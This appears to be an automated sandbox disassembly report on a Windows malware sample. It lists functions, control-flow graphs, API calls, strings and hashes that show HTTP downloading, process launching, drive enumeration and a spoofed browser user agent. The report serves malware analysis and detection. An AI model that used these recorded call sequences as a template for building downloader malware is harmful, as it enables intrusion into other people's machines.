                                                                                                                    control_flow_graph 668 40dbc0-40dc5b memset InternetCrackUrlA InternetOpenA 669 40dc61-40dc94 InternetConnectA 668->669 670 40ddd7-40dde0 668->670 671 40ddca-40ddd1 InternetCloseHandle 669->671 672 40dc9a-40dcca HttpOpenRequestA 669->672 671->670 673 40dcd0-40dce7 HttpSendRequestA 672->673 674 40ddbd-40ddc4 InternetCloseHandle 672->674 675 40ddb0-40ddb7 InternetCloseHandle 673->675 676 40dced-40dcf1 673->676 674->671 675->674 677 40dda6 676->677 678 40dcf7 676->678 677->675 679 40dd01-40dd08 678->679 680 40dd99-40dda4 679->680 681 40dd0e-40dd30 InternetReadFile 679->681 680->675 682 40dd32-40dd39 681->682 683 40dd3b 681->683 682->683 684 40dd3d-40dd94 call 409fe0 memcpy 682->684 683->680 684->679
                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040DBE8
                                                                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                    • String ID: <$GET
                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                                                                    Function 00406BC0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0
                                                                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                      • Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
                                                                                                                    Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60sleepprocessCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 708 40e980-40e9e0 memset * 2 CreateProcessW 709 40e9f1-40ea15 ShellExecuteW 708->709 710 40e9e2-40e9ef Sleep 708->710 712 40ea26 709->712 713 40ea17-40ea24 Sleep 709->713 711 40ea28-40ea2b 710->711 712->711 713->711
                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040E98E
                                                                                                                    • memset.NTDLL ref: 0040E99E
                                                                                                                    • CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E9E7
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                    • String ID: $D$Gy@$open
                                                                                                                    • API String ID: 3787208655-4184347819
                                                                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59
                                                                                                                    Function 0040E7C0 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902698870-0
                                                                                                                    • Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                                                                    • Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                                                                    Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3862671961-0
                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                                                                    Function 0040B2C0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                                                                    • CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                    • String ID: Vz@
                                                                                                                    • API String ID: 439099756-880565244
                                                                                                                    • Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                                                                    • Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 671207744-0
                                                                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                    Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                                                                    Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                                                                    Strings
                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                                                                    Function 00405BC0 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                                                                    • CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3956458805-0
                                                                                                                    • Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                                                                    • Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                                                                    Function 00406060 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                                                                    • CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1457358591-0
                                                                                                                    • Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                                                                    • Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                                                                    Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: device$deviceType
